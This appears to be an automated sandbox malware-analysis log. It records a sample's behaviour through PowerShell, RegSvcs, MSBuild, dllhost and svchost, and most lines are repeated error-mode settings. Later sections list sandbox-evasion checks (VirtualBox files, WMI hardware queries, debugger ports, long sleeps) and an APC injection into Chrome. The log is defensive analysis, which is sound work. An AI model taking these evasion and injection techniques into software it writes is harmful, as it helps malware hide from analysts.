            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dllhost.exeAPI/Special instruction interceptor: Address: 7FF8148AD044
            Source: C:\Windows\System32\svchost.exeAPI/Special instruction interceptor: Address: 7FF8148AD044
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 1160000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 2BF0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 4BF0000 memory commit | memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: VBoxGuest
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: C:\Windows\SysWOW64\vboxservice.exe
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: C:\Windows\SysWOW64\vboxtray.exe
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: VBoxTrayIPC
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: C:\Windows\SysWOW64\vboxhook.dll
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: \pipe\VBoxTrayIPC
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: VBoxMiniRdrDN
            Source: C:\Windows\SysWOW64\dllhost.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9059
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 818
            Source: C:\Windows\System32\svchost.exe TID: 5600Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep count: 9059 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep count: 818 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\SysWOW64\dllhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\svchost.exeProcess created / APC Queued / Resumed: C:\Program Files\Google\Chrome\Application\chrome.exe
